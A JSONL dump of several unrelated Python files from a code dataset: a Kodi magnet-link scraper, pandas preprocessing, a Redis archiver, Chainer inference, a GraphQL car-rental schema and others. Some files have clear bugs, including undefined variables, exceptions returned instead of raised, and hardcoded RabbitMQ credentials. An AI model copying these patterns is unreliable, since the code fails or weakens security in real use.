self._json_get(check_url, cache_limit=.1)\n if 'hashes' in hash_data:\n new_data['hashes'] = dict((hash_id.lower(), hash_data['hashes'][hash_id]) for hash_id in hash_data['hashes'])\n return new_data\n \n def get_url(self, video):\n return self._default_get_url(video)\n\n def _get_episode_url(self, show_url, video):\n result = self.__find_episode(show_url, video)\n if result:\n return show_url\n \n def __find_episode(self, show_url, video):\n url = urlparse.urljoin(self.tv_base_url, show_url)\n html = self._http_get(url, cache_limit=2)\n magnets = dom_parser.parse_dom(html, 'a', {'class': 'magnet'}, ret='href')\n titles = dom_parser.parse_dom(html, 'a', {'class': 'magnet'}, ret='title')\n titles = [re.sub('\\s+[Mm]agnet\\s+[Ll]ink', '', title) for title in titles]\n hashes = []\n for i, magnet in enumerate(magnets):\n match = re.search('urn:btih:(.*?)(?:&|$)', magnet, re.I)\n if match:\n hashes.append((match.group(1), titles[i]))\n \n episode_pattern = 'S%02dE%02d' % (int(video.season), int(video.episode))\n if video.ep_airdate:\n airdate_pattern = '%d(-|.| )%02d(-|.| )%02d' % (video.ep_airdate.year, video.ep_airdate.month, video.ep_airdate.day)\n else:\n airdate_pattern = ''\n \n matches = [link for link in hashes if re.search(episode_pattern, link[1], re.I)]\n if not matches and airdate_pattern:\n matches = [link for link in hashes if re.search(airdate_pattern, link[1])]\n return matches\n\n def search(self, video_type, title, year, season=''):\n if video_type == VIDEO_TYPES.MOVIE:\n return self.__movie_search(title, year)\n else:\n return self.__tv_search(title, year)\n\n def __movie_search(self, title, year):\n results = []\n search_url = MOVIE_SEARCH_URL % (urllib.quote_plus(title))\n search_url = urlparse.urljoin(self.movie_base_url, search_url)\n js_data = self._json_get(search_url, cache_limit=1)\n if 'data' in js_data and 'movies' in js_data['data']:\n for movie in js_data['data']['movies']:\n match_year = str(movie['year'])\n match_url = movie['url'] + '?movie_id=%s' % (movie['id'])\n if 'title_english' in movie:\n match_title = movie['title_english']\n else:\n match_title = movie['title']\n \n if not year or not match_year or year == match_year:\n result = {'title': scraper_utils.cleanse_title(match_title), 'year': match_year, 'url': scraper_utils.pathify_url(match_url)}\n results.append(result)\n \n return results\n \n def __tv_search(self, title, year):\n results = []\n search_url = urlparse.urljoin(self.tv_base_url, '/showlist/')\n html = self._http_get(search_url, cache_limit=48)\n match_year = ''\n norm_title = scraper_utils.normalize_title(title)\n for item in dom_parser.parse_dom(html, 'td', {'class': 'forum_thread_post'}):\n match = re.search('href=\"([^\"]+)[^>]+>([^<]+)', item)\n if match:\n match_url, match_title = match.groups()\n if match_title.upper().endswith(', THE'):\n match_title = 'The ' + match_title[:-5]\n \n if norm_title in scraper_utils.normalize_title(match_title) and (not year or not match_year or year == match_year):\n result = {'title': scraper_utils.cleanse_title(match_title), 'year': match_year, 'url': scraper_utils.pathify_url(match_url)}\n results.append(result)\n return results\n\n @classmethod\n def get_settings(cls):\n settings = super(cls, cls).get_settings()\n settings = scraper_utils.disable_sub_check(settings)\n name = cls.get_name()\n settings.append(' ' % (name, i18n('use_https')))\n settings.append(' ' % (name, i18n('username')))\n settings.append(' ' % (name, i18n('password')))\n settings.append(' ' % (name, i18n('movies'), i18n('base_url'), cls.movie_base_url))\n settings.append(' ' % (name, i18n('tv_shows'), i18n('base_url'), cls.tv_base_url))\n return settings\n\n def _json_get(self, url, data=None, allow_redirect=True, cache_limit=8):\n if not self.username or not self.password:\n return {}\n \n if data is None: data = {}\n if 'premiumize.me' in url.lower():\n data.update({'customer_id': self.username, 'pin': self.password})\n result = super(self.__class__, self)._http_get(url, data=data, allow_redirect=allow_redirect, cache_limit=cache_limit)\n js_result = scraper_utils.parse_json(result, url)\n if 'status' in js_result and js_result['status'] == 'error':\n msg = js_result.get('message', js_result.get('status_message', 'Unknown Error'))\n log_utils.log('Premiumize Scraper Error: %s - (%s)' % (url, msg), log_utils.LOGWARNING)\n js_result = {}\n \n return js_result\n","sub_path":"scrapers/premiumize_scraper.py","file_name":"premiumize_scraper.py","file_ext":"py","file_size_in_byte":14790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"176066703","text":"import pandas as pd\nimport numpy as np\nimport math\n\ndef response_outlier_capping(df, variable, multiplier):\n\n ''' windsorise the response variable '''\n\n q1 = np.percentile(df[variable],25)\n q3 = np.percentile(df[variable],75)\n iqr = q3 - q1\n lower = q1 - (iqr * multiplier)\n upper = q3 + (iqr * multiplier)\n\n df[variable] = np.where(df[variable]<=lower, lower, df[variable])\n df[variable] = np.where(df[variable]>=upper, upper, df[variable])\n\n return df\n\ndef log_response(df, response):\n\n ''' take the natural log of the response variable '''\n\n print('Skewness of untransformed response:\\t' + str(df[response].skew()))\n\n # transform response column to ensure +ve\n minimum_val = math.ceil(min(abs(np.log(df[response]))))\n original_data = np.log(df[response]) + minimum_val\n df[response] = np.log(df[response])\n print('Skewness of transformed response:\\t' + str(df[response].skew()))\n\n return df\n\ndef predictors_one_hot_encoding(df):\n\n ''' one hot encode categorical features '''\n\n # find all relevant columns\n all_columns = list(df.columns)\n numeric_types = ['int16', 'int32', 'int64', 'float16', 'float32', 'float64', 'uint8']\n numeric_columns = df.select_dtypes(include=numeric_types).columns.to_list()\n categoric_columns = list(set(all_columns) - set(numeric_columns))\n\n for i in categoric_columns:\n one_hot = pd.get_dummies(df[i], prefix=i)\n df = df.join(one_hot)\n\n # remove categoric cols\n numeric_columns = df.select_dtypes(include=numeric_types).columns.to_list()\n df = df[numeric_columns]\n\n return df\n\ndef exp_response(df, response):\n\n ''' transform the response variable back to original'''\n\n df[response] = np.exp(df[response])\n\n\ndef find_numerics(df):\n ''' searches a dataframe and returns numeric columns (excluding id cols)'''\n\n # numeric data types\n numeric_dtype = ['int16', 'int32', 'int64', 'float16', 'float32', 'float64']\n\n # define all numeric cols\n all_numeric_columns = list(df.select_dtypes(include=numeric_dtype).columns)\n id_columns = ['id', 'loss']\n\n # define all numeric cols excluding id cols\n numeric_columns = list(set(all_numeric_columns) - set(id_columns))\n return numeric_columns\n\n\ndef store_scaling_values(df):\n ''' stores mean and std values '''\n\n # load numeric features to be scaled\n numeric_columns=find_numerics(df)\n\n # create dataframe with stored values\n scaling_df = pd.DataFrame([p, df[p].mean(), df[p].std()] for p in numeric_columns)\n scaling_df.columns = ['col', 'mean', 'std']\n\n # save the values\n scaling_df.to_csv('outputs/scaling.csv', index=False)\n\n\ndef scale_numerics(df):\n\n ''' read the scaled values and convert numeric features '''\n\n # read the scaled values\n scaling_df = pd.read_csv('outputs/scaling.csv')\n\n # scale columns\n for i in range(scaling_df.shape[0]):\n col = scaling_df.iloc[i][0]\n mean = scaling_df.iloc[i][1]\n std = scaling_df.iloc[i][2]\n df[col] = (df[col] - mean) / std\n\n","sub_path":"xgb/data_transformation.py","file_name":"data_transformation.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"467729498","text":"#!/usr/bin/python\n\nfrom redis import Redis\nimport time\nimport datetime\n\nfrom erigam.lib import ARCHIVE_PERIOD, get_time\nfrom erigam.lib.archive import archive_chat, delete_chat_session, delete_session\nfrom erigam.lib.model import sm, Ban\nfrom erigam.lib.request_methods import redis_pool\n\nif __name__ == '__main__':\n\n db = sm()\n\n print(\"Archiving script started.\")\n redis = Redis(connection_pool=redis_pool)\n\n current_time = datetime.datetime.utcnow()\n\n while True:\n\n new_time = datetime.datetime.utcnow()\n\n # Every minute\n if new_time.minute != current_time.minute:\n print(\"running archiving\")\n\n # Expire IP bans.\n db.query(Ban).filter(Ban.expires < datetime.datetime.utcnow()).delete()\n db.commit()\n\n # Archive chats.\n for chat in redis.zrangebyscore('archive-queue', 0, get_time()):\n print(\"archiving chat: \", chat)\n archive_chat(redis, db, chat)\n\n online = redis.scard('chat.'+chat+'.online')\n idle = redis.scard('chat.'+chat+'.idle')\n # Stop archiving if no-one is online any more.\n if online + idle == 0:\n redis.zrem('archive-queue', chat)\n else:\n redis.zadd('archive-queue', chat, get_time(ARCHIVE_PERIOD))\n\n # Delete chat-sessions.\n for chat_session in redis.zrangebyscore('chat-sessions', 0, get_time()):\n print(\"deleting chat session: \", chat_session)\n delete_chat_session(redis, *chat_session.split('/'))\n\n # Delete sessions.\n for session_id in redis.zrangebyscore('all-sessions', 0, get_time()):\n print(\"deleting session: \", session_id)\n delete_session(redis, session_id)\n\n current_time = new_time\n\n time.sleep(1)\n","sub_path":"erigam/archiver.py","file_name":"archiver.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"466677754","text":"from .preprocessing import preprocessing\nfrom .embedding import Embedding\n# from .model import model\nfrom .old_vinn import model\n\nfrom . import Variable, operation, Linear, Graph, node, Sigmoid, cp, np, F, device_guard\n# from NN.NNWrapper import operation, Variable, wrapper, operation, device_guard\n\nfrom timeit import default_timer\nfrom BASIC_LIST.basic import groupby\nfrom IO.basic import load_obj\n\nimport chainer\nfrom .prepare import Channels_pooling\n\n\ndef inference(img, pos, checkPath, device, design=None, patch_size=61, step=30, channels=4095):\n\top = operation(device=device)\n\n\tpreprocess = preprocessing(img, channels=channels, half_size=patch_size//2, device=device, step=step)\n\tembedding = Embedding(patch_size, device=device)\n\t# channels_pooling = Channels_pooling(stride=channels_pooling_stride, device=device)\n\n\n\tembedding_dim = patch_size//2 +1 \n\t_model = model(design=design, device=device, embedding_dim=embedding_dim)\n\tparam_dict = load_obj(checkPath)\n\t# _model.param_from_dict(param_dict)\n\twith device_guard(device):\n\t\tfor key, param in _model.namedparams():\n\t\t\tparam.copydata(chainer.Parameter(cp.asarray(param_dict[key])))\t\n\n\tpos = op.array(pos)\n\n\t_x, pos, groups_start, groups_end = preprocess(pos)\n\n\tPRED = []\n\n\twith device_guard(device):\n\n\t\tfor index in range(groups_start.shape[0]):\n\t\t\t_end = default_timer()\n\n\t\t\tstart = groups_start[index]\n\t\t\tend = groups_end[index]\n\n\t\t\tstart, end = int(start.ndarray()), int(end.ndarray())\n\n\t\t\tx = _x[:,:,start:end]\n\n\t\t\tx = preprocess.beforeEmbedding(x)\n\n\t\t\tx = embedding(x)\n\n\t\t\t# x = x.transpose([1,0,2,3])\n\t\t\t# x = channels_pooling(x)\n\t\t\t# x = x.transpose([1,0,2,3])\n\n\t\t\tx.cast(cp.float32)\n\n\t\t\tx = _model(x)\n\n\t\t\t# x = _model(x)\n\n\t\t\tpred = op.argmax(x, axis=1)\n\t\t\tPRED.append(pred)\n\n\t\tPRED = op.concatenate(PRED, axis=0)\n\n\treturn PRED, pos\n\ndef inference_kernel(img, pos, checkPath, device):\n\top = operation(device=device)\n\tPRED, pos = inference(img, pos, checkPath, device, size=31)\n\tPRED = op.asnumpy(PRED)\n\tpos = op.asnumpy(pos)\n\tprint(type(PRED), type(pos))\n\n\tnp.save(\"./log/{}_PRED.npy\".format(device), PRED)\n\tnp.save(\"./log/{}_pos.npy\".format(device), pos)\n\nimport multiprocessing as mp\ndef multi_inference(img, pos, checkPath, device_list=[1,2,3]):\n\t'''\n\timg should be numpy array\n\tpos should be list\n\t'''\n\tnum_gpu = len(device_list)\n\tpos_groups = groupby(pos, num_gpu, key='num')\n\n\tctx = mp.get_context('forkserver')\n\n\t# ctx = mp.get_context('spawn')\n\t# que = mp.Queue()\n\n\t# que = ctx.Array('i', range(10))\n\n\tprocesses = []\n\timg = img.astype(np.int32)\n\tcompare = np.arange(4095, dtype=np.int32)\n\tcompare = np.expand_dims(compare, axis=0)\n\n\tfor device, pos in zip(device_list, pos_groups):\n\t\t# with device_guard(device):\n\t\tp = ctx.Process(target=inference_kernel, args=(img, pos, checkPath, device))\n\t\tp.start()\n\t\tprocesses.append(p)\n\t\tprint(device, \"start\")\n\n\n\tfor index, p in enumerate(processes):\n\t\tp.join()\n\n\tPRED = []\n\tpos = []\n\tfor device in device_list:\n\t\tPRED.append(np.load(\"./log/{}_PRED.npy\".format(device)))\n\t\tpos.append(np.load(\"./log/{}_pos.npy\".format(device)))\n\n\tPRED = np.concatenate(PRED, axis=0)\n\tpos = np.concatenate(pos, axis=0)\n\t\n\treturn PRED, pos\n\ndef analyze(img, checkPath, targetPath, device):\n\tstride = 5\n\tpos_x = np.arange(0, 2048, stride)\n\tpos_y = np.arange(0, 2048, stride)\n\tvx, vy = np.meshgrid(pos_x, pos_y)\n\tpos = np.stack([vx, vy]).reshape((2, -1)).transpose([1,0])\n\n\tPRED, pos = inference(img, pos, checkPath, device, size=31)\n\n\top = operation(device=device)\n\n\tINDEX = op.where(PRED>0)\n\tprint(\"finished where\")\n\tpos = pos[INDEX]\n\tpos = pos.ndarray().get()\n\n\timg = rescale_intensity(img.astype('uint8'))\n\n\timg = drawRedPoints(img, pos, half_size=2)\n\n\timwrite(img, targetPath)\n\ndef doubleLayer_analyze(img, device=0):\n\top = operation(device=device)\n\tstride = 31\n\tpos_x = np.arange(0, 2048, stride)\n\tpos_y = np.arange(0, 2048, stride)\n\tvx, vy = np.meshgrid(pos_x, pos_y)\n\tpos = np.stack([vx, vy]).reshape((2, -1)).transpose([1,0])\n\n\tcheckPath = \"./log/params/size_61/20.pkl\"\n\n\tPRED, pos = inference(img, pos, checkPath, device, size=61, step=10)\n\n\tpos = pos[op.where(PRED>0)]\n\n\treturn pos\n\n\n\nif __name__ == '__main__':\n\tfrom CV.ImageIO import center_cell, imreadTif, imshow_plt, plt, gray2rgb, drawMarker, drawRedPoints, imwrite, rescale_intensity\n\timport os, re\n\tcheckPath = \"./log/params/pertube/third_stage.pkl\"\n\n\t# files = list(filter(lambda x:re.search(\"tif\", x), os.listdir(\"./log/imgs\")))\n\t# for file in files:\n\t# \tpath = \"./log/imgs/\"+file \n\t# \ttargetPath = path.replace(\"tif\", \"png\")\n\t# \timg = imreadTif(path)\n\t# \tanalyze(img, checkPath, targetPath, 0)\n\n\n\tpath = \"../../../../DATA/CELL/10.tif\"\n\timg = imreadTif(path)\n\tpos = doubleLayer_analyze(img)\n\n\tpos = pos.cpu()\n\t_pos = []\n\n\thalf_size = 15\n\n\tfor x in range(-1*half_size, half_size, 5):\n\t\tfor y in range(-1*half_size, half_size, 5):\n\t\t\t_pos.append(pos+np.array([x, y]))\n\n\tpos = np.concatenate(_pos, axis=0)\n\tprint(pos.shape)\n\n\timg = rescale_intensity(img.astype('uint8'))\n\n\timg = drawRedPoints(img, pos, half_size=2)\n\n\timwrite(img, \"./log/result.png\")\n\n# if __name__ == '__main__':\n# \tfrom CV.ImageIO import center_cell, imreadTif, imshow_plt, plt, gray2rgb, drawMarker, drawRedPoints, imwrite, rescale_intensity\n# \timport os, re\n# \tfrom timeit import default_timer as timer\n# \tpath = \"../../../../DATA/CELL/10.tif\"\n# \t# path = \"/media/processed/Dec_2017/CST-20171211-01/changhai12.11/DATA/\"\n# \t# path = path+list(filter(lambda x: re.search(\"tif\", x), os.listdir(path)))[0]\n# \tprint(path)\n\n# \t# checkPath = \"./log/params/size_61/25.pkl\"\n# \t# checkPath = \"./log/params/size_31/60.pkl\"\n# \t# checkPath = \"./log/params/size_61/17.pkl\"\n# \tcheckPath = \"./log/params/pertube/third_stage.pkl\"\n\n# \tend = timer()\n\n# \timg = imreadTif(path)\n\n# \tstride = 60\n\n# \tpos_x = np.arange(0, 2048, stride)\n# \tpos_y = np.arange(0, 2048, stride)\n# \tvx, vy = np.meshgrid(pos_x, pos_y)\n# \tpos = np.stack([vx, vy]).reshape((2, -1)).transpose([1,0]).astype(np.int32)\n# \tprint(pos.shape)\n# \t# pos = pos[:1000]\n\n# \t# multi_inference(img, pos.tolist(), checkPath)\n# \t# PRED, pos = multi_inference(img, pos.tolist(), checkPath, device_list=[1,2,3])\n\n# \tdevice = 0\n\n# \tPRED, pos = inference(img, pos, checkPath, device, size=31)\n\n# \tprint(type(PRED), type(pos))\n# \top = operation(device=device)\n\n# \tINDEX = op.where(PRED>0)\n# \tprint(\"finished where\")\n# \tpos = pos[INDEX]\n# \tpos = pos.ndarray().get()\n\n\n# \timg = rescale_intensity(img.astype('uint8'))\n\n# \t# for pt in pos:\n# \t# \timg = drawMarker(img, pt)\n# \timg = drawRedPoints(img, pos,half_size=2)\n\n# \timwrite(img, \"./log/result.png\")\n\n# \tprint(timer()-end)","sub_path":"zoo/vinn/model/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":6538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"340728148","text":"import pandas as pd\r\nfrom IPython.display import display\r\n\r\ndrug = pd.read_csv(\"drug.csv\")\r\n\r\ndrug = drug[[\"state\",\"state_code\",\"year\",\"drug_deaths\"]]\r\ndrug.head()\r\n\r\n\r\ndrug.isnull().sum().head() #comprobación de los datos en blanco\r\n\r\n\r\n\r\ndisplay(drug[\"state\"].value_counts()) #revisando si todas estados tienen los mismos datos\r\n\r\ndisplay(drug[\"state_code\"].value_counts())\r\n\r\ndisplay(drug[\"year\"].value_counts())\r\n\r\ndrug.columns = ['State', 'State code','Year','Drug death'] #renombrando columnas\r\n\r\ndisplay(drug)\r\ndrug = drug[drug.Year != 1999]\r\ndrug\r\n\r\ndrug.to_csv(\"drug_1\")\r\n\r\nimport requests as rq\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\n\r\nurl = 'https://en.wikipedia.org/wiki/2000_United_States_Census'\r\n\r\nwiki = data = rq.get(url)\r\n\r\ncaldo = BeautifulSoup(wiki.text, 'html.parser')\r\n\r\ncaldo.head()\r\n\r\ndf = github.select(\"table.toccolours\")\r\ndf\r\n\r\n\r\n","sub_path":"PR.py","file_name":"PR.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"593408711","text":"#!/usr/bin/env python\nimport pika\ncred = pika.PlainCredentials('kevin','kevin')\n\nconnection = pika.BlockingConnection(\n pika.ConnectionParameters(host='192.168.0.105', credentials=cred, virtual_host='vhost'))\nchannel = connection.channel()\n\nchannel.queue_declare(queue='hello')\n\nchannel.basic_publish(exchange='', routing_key='hello', body='Hello World!')\nprint(\" [x] Sent 'Hello World!'\")\nconnection.close()","sub_path":"send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"225291765","text":"import graphene\nfrom graphene_django.types import DjangoObjectType\nfrom .models import Customer, Car, Rental\nfrom django.utils import timezone\nfrom django.core.exceptions import ValidationError, ObjectDoesNotExist\n\nclass CarType(DjangoObjectType):\n\tclass Meta:\n\t\tmodel = Car\n\t\tfields = '__all__'\n\t\t\nclass CustomerType(DjangoObjectType):\n\tclass Meta:\n\t\tmodel = Customer\n\t\tfields = '__all__'\n\t\t\nclass RentalType(DjangoObjectType):\n\tclass Meta:\n\t\tmodel = Rental\n\t\tfields = '__all__'\n\t\t\nclass Query(graphene.ObjectType):\n\tall_cars = graphene.List(CarType)\n\t\n\tall_customers = graphene.List(CustomerType)\n\n\tall_rentals = graphene.List(RentalType)\n\t\n\tdef resolve_all_cars(self, info, **kwargs):\n\t\treturn Car.objects.all()\n\n\tdef resolve_all_customers(self, info, **kwargs):\n\t\treturn Customer.objects.all()\t\n\n\tdef resolve_all_rentals(self, info, **kwargs):\n\t\treturn Rental.objects.filter(rented_date_to, Car.car_make, Customer.contact)\n\t\t\t\nclass CreateCar(graphene.Mutation):\n\tid=graphene.Int()\n\tcar_make=graphene.String()\n\tcar_color=graphene.String()\n\n\tclass Arguments:\n\t\tcar_make=graphene.String()\n\t\tcar_color=graphene.String()\n\n\tdef mutate(self, info, car_make, car_color):\n\t\tcar = Car(car_make=car_make,\n\t\t\t\t\tcar_color=car_color)\n\t\tcar.save()\n\t\treturn CreateCar(\n\t\t\tid=car.id,\n\t\t\tcar_make=car.car_make,\n\t\t\tcar_color=car.car_color)\n\t\t\t\nclass ModifyCar(graphene.Mutation):\n\t\n\tclass Arguments:\n\t\tid=graphene.ID()\n\t\tcar_make=graphene.String()\n\t\tcar_color=graphene.String()\n\t\n\tcar = graphene.Field(CarType)\n\t\n\tdef mutate(self, info, id, car_make, car_color):\n\t\ttry: \n\t\t\tCar.objects.get(id=id)\n\t\texcept ObjectDoesNotExist: \n\t\t\treturn ObjectDoesNotExist(\"Car with this id does not exist\")\n\t\tcar = Car.objects.get(pk=id)\n\t\tcar.car_make = car_make\n\t\tcar.car_color = car_color\n\t\tcar.save()\n\t\treturn ModifyCar(car=car)\n\t\t\n\nclass CreateCustomer(graphene.Mutation):\n\tid=graphene.ID()\n\tcustomer_name=graphene.String()\n\tcontact=graphene.String()\n\n\tclass Arguments:\n\t\tcustomer_name=graphene.String()\n\t\tcontact=graphene.String()\n\t\n\tdef mutate(self, info, customer_name, contact):\n\t\tcustomer = Customer(customer_name=customer_name,\n\t\t\t\t\tcontact=contact)\n\t\tcustomer.save()\n\t\treturn CreateCustomer(\n\t\t\tid=customer.id,\n\t\t\tcustomer_name=customer.customer_name,\n\t\t\tcontact=customer.contact)\n\n\nclass ModifyCustomer(graphene.Mutation):\n\tclass Arguments:\n\t\tid=graphene.ID()\n\t\tcustomer_name=graphene.String()\n\t\tcontact=graphene.String()\n\t\t\n\tcustomer = graphene.Field(CustomerType)\n\t\n\tdef mutate(self, info, id, customer_name, contact):\n\t\ttry: \n\t\t\tCustomer.objects.get(id=id)\n\t\texcept ObjectDoesNotExist: \n\t\t\treturn ObjectDoesNotExist(\"Customer with this id does not exist\")\n\t\tcustomer.customer_name=customer_name\n\t\tcustomer.contact=contact\n\t\tcustomer.save()\n\t\treturn ModifyCustomer(id=customer.id,\n\t\t\tcustomer_name=customer.customer_name,\n\t\t\tcontact=customer.contact)\n\nclass CreateRental(graphene.Mutation):\n\tid=graphene.ID()\n\tcar_id=graphene.ID()\n\tcustomer_id=graphene.ID()\n\tcurrently_rented=graphene.Boolean()\n\trented_date_from=graphene.DateTime()\n\trented_date_to=graphene.DateTime()\n\n\tclass Arguments:\n\t\tcar_id=graphene.ID()\n\t\tcustomer_id=graphene.ID()\n\t\tcurrently_rented=graphene.Boolean()\n\t\trented_date_from=graphene.DateTime()\n\t\trented_date_to=graphene.DateTime()\n\n\tdef mutate(self, info, car_id, customer_id, currently_rented, rented_date_from, rented_date_to):\n\t\ttry: \n\t\t\tCar.objects.get(id=car_id)\n\t\texcept ObjectDoesNotExist: \n\t\t\treturn ObjectDoesNotExist(\"Car with this id does not exist\")\n\t\ttry: \n\t\t\tCustomer.objects.get(id=customer_id)\n\t\texcept ObjectDoesNotExist: \n\t\t\treturn ObjectDoesNotExist(\"Customer with this id does not exist\")\n\t\tall_rentals = Rental.objects.filter(car_id=car_id)\n\t\trentals_date_from_values = all_rentals.values_list('rented_date_from', flat=True)\n\t\trentals_date_to_values = all_rentals.values_list('rented_date_to', flat=True)\n\t\trental = Rental(car_id=car_id, customer_id=customer_id, currently_rented=currently_rented, rented_date_from=rented_date_from, rented_date_to=rented_date_to)\n\t\ti = 0\n\t\tif (rented_date_from >= timezone.now() and rented_date_to > timezone.now() and rented_date_to > rented_date_from):\n\t\t\twhile i < len(all_rentals):\n\t\t\t\tif not (rentals_date_from_values[i] <= rented_date_from <= rentals_date_to_values[i] or rentals_date_from_values[i] <= rented_date_to <= rentals_date_to_values[i]\n\t\t\t\tor (rented_date_from <= rentals_date_from_values[i] and rented_date_to >= rentals_date_to_values[i])):\n\t\t\t\t\ti+=1\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\treturn ValidationError(\"Rented date violation\")\n\t\t\trental.save()\n\t\t\treturn CreateRental(\n\t\t\tid=rental.id,\n\t\t\tcar_id=rental.car_id, \n\t\t\tcustomer_id=rental.customer_id, \n\t\t\tcurrently_rented=rental.currently_rented, \n\t\t\trented_date_from=rental.rented_date_from, \n\t\t\trented_date_to=rental.rented_date_to)\n\t\telse:\n\t\t\treturn ValidationError(\"Rented date violation\")\n\n\t\t\t\n\t\t\t\nclass ModifyRental(graphene.Mutation):\n\tid=graphene.ID()\n\tcar_id=graphene.ID()\n\tcustomer_id=graphene.ID()\n\tcurrently_rented=graphene.Boolean()\n\trented_date_from=graphene.DateTime()\n\trented_date_to=graphene.DateTime()\n\tclass Arguments:\n\t\tid=graphene.ID()\n\t\tcar_id=graphene.ID()\n\t\tcustomer_id=graphene.ID()\n\t\tcurrently_rented=graphene.Boolean()\n\t\trented_date_from=graphene.DateTime()\n\t\trented_date_to=graphene.DateTime()\n\t\t\n\trental = graphene.Field(RentalType)\n\t\n\tdef mutate(self, info, id, car_id, customer_id, currently_rented, rented_date_from, rented_date_to):\n\t\tif Car.objects.filter(id=car_id).first() is None:\n\t\t\traise ObjectDoesNotExist(\"Car with this id does not exist\")\n\t\tif Customer.objects.filter(id=customer_id).first() is None:\n\t\t\traise ObjectDoesNotExist(\"Customer with this id does not exist\")\n\t\trental = Rental(id=id,car_id=car_id, customer_id=customer_id, currently_rented=currently_rented, rented_date_from=rented_date_from, rented_date_to=rented_date_to)\n\t\tall_rentals = Rental.objects.filter(car_id=car_id).exclude(id=rental.id)\n\t\trentals_date_from_values = all_rentals.values_list('rented_date_from', flat=True)\n\t\trentals_date_to_values = all_rentals.values_list('rented_date_to', flat=True)\n\t\ti = 0\n\t\tif (rented_date_from > timezone.now() and rented_date_to > timezone.now() and rented_date_to > rented_date_from):\n\t\t\twhile i < len(all_rentals):\n\t\t\t\tif not (rentals_date_from_values[i] <= rented_date_from <= rentals_date_to_values[i] or rentals_date_from_values[i] <= rented_date_to <= rentals_date_to_values[i]\n\t\t\t\tor ((rented_date_from <= rentals_date_from_values[i]) and (rented_date_to >= rentals_date_to_values[i]))):\n\t\t\t\t\ti+=1\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\treturn ValidationError(\"Rented date violation\")\n\n\t\telse:\n\t\t\treturn ValidationError(\"Rented date violation\")\n\t\trental.save()\n\t\treturn ModifyRental(id=rental.id,\n\t\tcar_id=rental.car_id, \n\t\tcustomer_id=rental.customer_id, \n\t\tcurrently_rented=rental.currently_rented, \n\t\trented_date_from=rental.rented_date_from, \n\t\trented_date_to=rental.rented_date_to)\n\t\n\t\t\t\n\t\t\nclass ReturnCar(graphene.Mutation):\n\tclass Arguments:\n\t\tid=graphene.ID()\n\t\tcar_id=graphene.Int()\n\t\tcustomer_id=graphene.ID()\n\t\tcurrently_rented=graphene.Boolean()\n\t\trented_date_from=graphene.DateTime()\n\t\trented_date_to=graphene.DateTime()\n\t\t\n\trental = graphene.Field(RentalType)\n\t\n\tdef mutate(self, info, id, car_id):\n\t\ttry: \n\t\t\tCar.objects.get(id=car_id)\n\t\texcept ObjectDoesNotExist: \n\t\t\treturn ObjectDoesNotExist(\"Car with this id does not exist\")\n\t\ttry:\n\t\t\tRental.objects.get(id=id)\n\t\texcept ObjectDoesNotExist: \n\t\t\treturn ObjectDoesNotExist(\"Rental with this id does not exist\")\n\t\trental = Rental.objects.get(id=id, car_id=car_id)\n\t\trental.currently_rented=False\n\t\trental.save()\n\t\treturn ReturnCar(rental=rental)\n\n\nclass ObtainRentals(graphene.Mutation):\n\n\tclass Arguments:\n\t\tid=graphene.ID()\n\t\tcar_id=graphene.Int()\n\t\tcustomer_id=graphene.ID()\n\t\tcurrently_rented=graphene.Boolean()\n\t\trented_date_from=graphene.DateTime()\n\t\trented_date_to=graphene.DateTime()\n\t\tcar_make=graphene.String()\n\t\tcontact=graphene.String()\n\t\t\n\trental = graphene.List(RentalType)\n\t\n\tdef mutate(self, info, **args):\n\t\tif 'contact'in args:\n\t\t\targs['customer__contact'] = args['contact']\n\t\t\tdel args['contact']\n\t\tif 'car_make' in args:\n\t\t\targs['car__car_make'] = args['car_make']\n\t\t\tdel args['car_make']\n\t\trental = Rental.objects.filter(**args\n\t\t) \n\t\treturn ObtainRentals(rental=rental)\n\n\t\t\n\t\t\n\n\nclass Mutations(graphene.ObjectType):\n\tcreate_car = CreateCar.Field()\n\tmodify_car = ModifyCar.Field()\n\tcreate_customer = CreateCustomer.Field()\n\tmodify_customer = ModifyCustomer.Field()\n\tcreate_rental = CreateRental.Field()\n\tmodify_rental = ModifyRental.Field()\n\treturn_car = ReturnCar.Field()\n\tobtain_rentals = ObtainRentals.Field()\n\t\n\t\nschema = graphene.Schema(query=Query, mutation=Mutations)\n\nresult = schema.execute()\n","sub_path":"carrental/rental/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":8669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"540343978","text":"import json\nimport pickle\n\ndef write_to_file(path, rows):\n if '.pkl' in path:\n with open(path, 'wb+') as fh:\n pickle.dump(rows, fh)\n else:\n with open(path, 'w+') as fh:\n json.dump(rows, fh)\n\ndef read_from_file(path):\n if '.pkl' in path:\n with open(path, 'rb') as fh:\n return pickle.load(fh)\n else:\n with open(path, 'r') as fh:\n return json.load(fh)\n\ndef read_cache(path, fn):\n path = './caches/' + path\n try:\n data = read_from_file(path)\n except FileNotFoundError:\n data = fn()\n write_to_file(path, data)\n return data\n","sub_path":"src/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"176275720","text":"import argparse\nimport asyncio\nimport collections\nimport datetime\nimport json\nimport os.path\n\nfrom aiosfstream import SalesforceStreamingClient, ReplayMarker\nfrom terminaltables import AsciiTable\n\nargs = {}\n\nasync def stream_events():\n path = os.path.expanduser(f\"~/.private/{args.credentials}.json\")\n creds_string = open(path).read()\n creds_js = json.loads(creds_string)\n streams = 